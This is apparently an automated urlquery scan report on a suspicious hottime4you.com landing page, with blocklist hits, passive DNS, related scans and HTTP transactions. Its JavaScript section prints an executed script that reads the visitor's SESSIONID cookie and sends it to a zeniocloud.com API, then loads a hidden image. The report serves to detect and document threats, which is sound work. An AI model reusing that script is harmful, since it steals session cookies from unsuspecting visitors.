Overview

URL hottime4you.com/ol/all/de/ms/25-687828?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696
IP104.21.61.179
ASNCLOUDFLARENET
Location
Report completed2022-10-04 07:46:05 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/js/step.js?506693 Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/css/style.css?506693 Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/js/backoffer.js Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/images/fremdgehen69_com.png?506693 Malware
2022-10-04 2 zeniocloud.com/JAIA.js?sub1=hottime4you.com Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (18)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-10-03 09:28:24 UTC 34.117.237.239
mnemonic passive DNS alexatracker.com (1) 0 2020-10-28 18:44:06 UTC 2022-10-03 04:39:59 UTC 51.68.197.173 Unknown ranking
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-10-03 09:28:24 UTC 34.208.31.97
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-10-04 02:04:45 UTC 142.250.74.10
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-10-03 07:33:36 UTC 23.36.77.32
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-10-04 00:45:50 UTC 143.204.55.27
mnemonic passive DNS ocsp.sca1b.amazontrust.com (1) 1015 2017-03-03 15:20:51 UTC 2019-03-27 04:05:54 UTC 143.204.42.158
mnemonic passive DNS lh3.google.com (1) 213 2013-06-02 21:16:56 UTC 2022-10-04 06:29:41 UTC 142.250.74.142
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-10-03 08:07:24 UTC 143.204.55.110
mnemonic passive DNS ajax.googleapis.com (1) 12905 2013-08-16 09:51:31 UTC 2022-10-04 03:44:22 UTC 142.250.74.42
mnemonic passive DNS accounts.google.com (2) 81 2016-09-05 09:39:47 UTC 2022-10-04 05:16:29 UTC 216.58.207.237
mnemonic passive DNS static.production.almightypush.com (3) 214819 2021-09-25 16:34:18 UTC 2022-10-03 23:55:54 UTC 54.230.111.86
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-10-04 02:06:24 UTC 93.184.220.29
mnemonic passive DNS fonts.gstatic.com (1) 0 2014-08-29 13:43:22 UTC 2022-10-03 23:48:04 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-10-04 04:18:32 UTC 34.120.237.76
mnemonic passive DNS zeniocloud.com (1) 0 2022-02-16 15:44:21 UTC 2022-10-04 05:18:57 UTC 167.114.67.56 Unknown ranking
mnemonic passive DNS hottime4you.com (28) 0 2021-12-06 17:55:18 UTC 2022-10-04 04:07:17 UTC 104.21.61.179 Unknown ranking
mnemonic passive DNS ocsp.pki.goog (9) 175 2017-06-14 07:23:31 UTC 2022-10-03 07:14:52 UTC 142.250.74.3


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.21.61.179

Date UQ / IDS / BL URL IP
2022-12-08 05:49:22 +0000
0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-12-02 05:34:13 +0000
0 - 0 - 7 hottime4you.com/ol/all/fr/ms/2-442857/ 104.21.61.179
2022-11-27 14:11:15 +0000
0 - 0 - 3 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-11-23 10:07:58 +0000
0 - 0 - 3 hottime4you.com/ol/all/fr/ms/3-204829/?cep=Gg (...) 104.21.61.179
2022-11-22 21:33:27 +0000
0 - 0 - 4 hottime4you.com/ol/all/us/ms/33-142532/?cep=9 (...) 104.21.61.179

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-09 16:00:15 +0000
0 - 0 - 2 feed.helperbar.com/?publisher={Publisher}&dpi (...) 188.114.97.1
2022-12-09 15:58:38 +0000
0 - 0 - 2 accounts-newpayees.com/ 172.67.145.173
2022-12-09 15:58:07 +0000
0 - 0 - 2 diversityvisa.info/ 188.114.97.1
2022-12-09 15:56:28 +0000
0 - 0 - 14 o9e3fivjlz638f30926b0e9.semnas.ru/ 172.67.138.138
2022-12-09 15:56:19 +0000
0 - 0 - 6 cba-helpcentre.info/a1b2c3/a49d60f1d3fc8ae887 (...) 104.21.33.36

Last 5 reports on domain: hottime4you.com

Date UQ / IDS / BL URL IP
2022-12-08 05:49:22 +0000
0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-12-04 14:21:13 +0000
0 - 0 - 5 hottime4you.com/ol/all/fr/ms/9-198919/ 172.67.212.155
2022-12-02 05:34:13 +0000
0 - 0 - 7 hottime4you.com/ol/all/fr/ms/2-442857/ 104.21.61.179
2022-11-30 11:57:21 +0000
0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/?cep=sb (...) 172.67.212.155
2022-11-30 11:57:18 +0000
0 - 0 - 1 hottime4you.com/ol/all/fr/ms/3-204829/ 172.67.212.155

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-10-26 16:06:29 +0000
0 - 0 - 5 hottime4you.com/ol/all/de/ms/25-687828?cep=4g (...) 172.67.212.155
2022-10-15 18:01:40 +0000
0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 172.67.212.155
2022-10-06 06:44:17 +0000
0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 104.21.61.179
2022-09-24 19:19:54 +0000
0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 104.21.61.179
2022-09-24 15:12:11 +0000
0 - 0 - 5 hottime4you.com/ol/all/de/ms/25-687828/?cep=c (...) 172.67.212.155


JavaScript

Executed Scripts (10)


Executed Evals (1)

#1 JavaScript::Eval (size: 1851, repeated: 1) - SHA256: 8faac1d4b4b0320fa574cfea57813c83556b75306c020aec04a1dbff7a6de1ac

                                        var Cgml = {
    apiUrl: 'https://zeniocloud.com/api/SlZpDGM75LM?domain=' + encodeURIComponent(location.protocol + '//' + location.hostname),
    self: this,
    getSession: function() {
        let sessionCookie = document.cookie.match(/SESSIONID=([^;]+)/);
        console.log(sessionCookie);
        if (sessionCookie && sessionCookie.length === 2) {
            return sessionCookie[1];
        }
        return null;
    },
    getApiUrl: function() {
        let session = this.getSession();
        if (session) {
            return this.apiUrl + '&session=' + session;
        }
        return this.apiUrl;
    },
    init: function() {
        this.domReady(() => {
            this.checkS().then(() => {
                Cgml.callApi();
            }).catch(() => {});
        });
        document.addEventListener("DOMContentLoaded", () => {
            let tst = 1;
        });
    },
    checkS: function() {
        return new Promise((resolve, reject) => {
            let img = this.stringToNode(`<img src="https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100" referrerpolicy="no-referrer" style="display: none;">`);
            document.body.appendChild(img);
            img.onerror = function() {
                reject();
            };
            img.onload = function() {
                resolve();
            };
        });
    },
    callApi: function() {
        fetch(this.getApiUrl()).then((response) => {
            return response.json();
        }).then((data) => {
            if (data.link) {
                document.body.appendChild(this.stringToNode(`<img src="${data.link}?pli=1" referrerpolicy="no-referrer" style="display: none;">`));
            }
        }).catch(function(err) {
            console.warn('Something went wrong due api call', err);
        });
    },
    stringToNode: function(str) {
        var parser = new DOMParser();
        var doc = parser.parseFromString(str, 'text/html');
        return doc.body.firstChild;
    },
    domReady: function(fn) {
        if (document.readyState !== 'loading') {
            fn();
        } else if (document.addEventListener) {
            document.addEventListener('DOMContentLoaded', fn, {
                once: true
            });
        } else {
            document.attachEvent('onreadystatechange', function() {
                if (document.readyState !== 'loading') fn();
            });
        }
    }
};
Cgml.init();
                                    

Executed Writes (0)



HTTP Transactions (67)


Request Response
                                        
                                            GET /ol/all/de/ms/25-687828?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.21.61.179
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LxJqIjp0mn8vMU9bt9LafGvSTjDOihTg1yfQW0%2FoWG5UTXnX6qwPHeK0gT47ldC1bLHRuKbOSIvoy5rMe7Zw7masPjAK1wDoNE7r8klaayeOHVUwt7aa6TulO6yhlFEtQmY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 754c4cf95917b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (518)
Size:   676
Md5:    315804a560ebefd09ca1ef7225da85b4
Sha1:   75f5232105ee96966f26cdec86789d659b6851bd
Sha256: 1ab35ee061f41502b363a8494a7748a10d5ad438e26e03b902a73b45529d1352
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1F611155394FAC39439B8EC8217D8CD493D6B588D372D264E0D66C03129C50C6"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3782
Expires: Tue, 04 Oct 2022 08:48:56 GMT
Date: Tue, 04 Oct 2022 07:45:54 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 06:47:04 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 dbfaae0db03f11cf713bbcbdb25be4a2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: Bafi4oPYjbct1xyjmTghILihyqvOV1MB_bDjSGxu034fsJ5TNCAujA==
Age: 3530


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    1b3053fa528e28810f8a2cc9284cc921
Sha1:   cca9eb471d941881a6b9a1793aecb6c281908f6a
Sha256: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.110
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 05:28:28 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 057fdebf738f5915bf38a78949190758.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: v1KAqwuL5RcJwD0JAzlPS-oP7vEdrISj3yMohMgYVaoD9iktF8wPQA==
age: 8247
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JJa7c0xm%2FRLGHv8zstxdg%2BuKNRU%2BRJyYipQ3bNmeCUSA%2BoDrGXjqC%2BU5rBKNTgG7p14vSnIzHj9kDVuj2LPh%2FsF%2FH%2FhkwkboFODXWqGjsUL8Y8R9YellMvOpiaxwBHWsDKw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 754c4cfacac3b524-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text
Size:   2446
Md5:    45767eafb625c40a5f5e7f27a115c2df
Sha1:   92f34794bf1c68b39a83a959a0bc7bdbe1fb593f
Sha256: 490d7650bcc9bd3cb03f1b5aedf44471c644c243b095b99390958dfb647e3425
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 04 Oct 2022 07:45:54 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /mng/subs_window.js?ver=1638888212 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.86
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 19491
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 07:04:47 GMT
etag: "ae593f4be1dd1f0710123918b49c4933"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: zrCKiPWXRLXkAASVh_TGBdiPYtp_OuGbIUvMVNnSiqIiV9MXkvcRUQ==
age: 2487
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   19491
Md5:    ae593f4be1dd1f0710123918b49c4933
Sha1:   66fbe30bb873e0a47d3d72e737d68aa4b6916c26
Sha256: fdf9ff3f74dcf11d0fa456dcd53cb21550f67f0cfdc11dc29bef595f07b56206
                                        
                                            GET /mng/subs_window.css?ver=1638888212 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.86
HTTP/2 200 OK
content-type: text/css
                                        
content-length: 6945
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 02:45:34 GMT
etag: "bd7dbae15f904a4e1213439ebfefddbe"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: TDaMpEtMnPy1aIKReC7bMHwmDeO8Asz2mwE9JTrITcfIoPBpuEVjzQ==
age: 18264
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   6945
Md5:    bd7dbae15f904a4e1213439ebfefddbe
Sha1:   9f7a33b3d6e7965d8b99f0ff56cbf2e2ebb8f78e
Sha256: 30c08f3bb42d9a16155c65fbc952430048e4a84be70b98cb989b2dc977b49f8a
                                        
                                            GET /ol/all/de/ms/25-687828/css/animation.css?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:25 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RRinJVa3OKp3kn%2F0Pu4NMMokXNEIlBqLLALA4n4QTqHlVCK3FvljQgfejSnTDQYnYPwQ0yEPV7wa4VQ0fsBfKtb7cDZjE63qcWCNFBxKauESrSrQdEc8gzDh34bCDZkSE70%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbcbeeb524-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text
Size:   523
Md5:    7d856f49fb85c308f7e3aade806615a1
Sha1:   a8afe132ac05e71b26e86069554a4f8fa0ba1956
Sha256: f48295eced6a46803e1b1b944fb1debb2f72c2d252dfeb0a8af0d5152b06b1d5
                                        
                                            GET /ol/all/de/ms/25-687828/js/step.js?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:33 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JsCEq3hP7TZsiIYKoNIg5yovwuyfrzY2FXk2db6P7hjpKZhTipaUwoKJcQW6N4JKF0WqiOo%2FwlztPaHnfwsvhVMWH59fsa3A0P6DQel%2FLk7zZYNouH0uas92L4IbOZ2G0h8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbee12b523-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text
Size:   865
Md5:    46a3a0281d7bd5455f99d71715bfbf53
Sha1:   9a88730bc5731b2f686aa3076ae9ec06ea78b439
Sha256: c4ad2f86a75743cff0db4e957c174c02149421b1c134fee9c84218c263320a81

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ol/all/de/ms/25-687828/css/style.css?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:25 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=filkJ2Prn%2Bzgj%2BSB%2F%2BSYr9ZKQB4orG%2Bmve5%2FJhGp0AnRUXTdxvML1l%2B8WelrwadknJYmwtSctcujTr5JqjIl4y0jy1IiOfW%2BAFj7kKhoak6ZYl78Z3XNjYA4eYOdUEYB3Lw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbccafb4f7-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  assembler source, ASCII text
Size:   1349
Md5:    72aad72b7a7577895dce7e46bfb0bfde
Sha1:   043e7652c5f102f7aba9d6257e29e5ff583cb078
Sha256: 6089d2910cd66df85fbaf684d2275de5c73e8c7f795529e967b7e0a0deea88c9

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
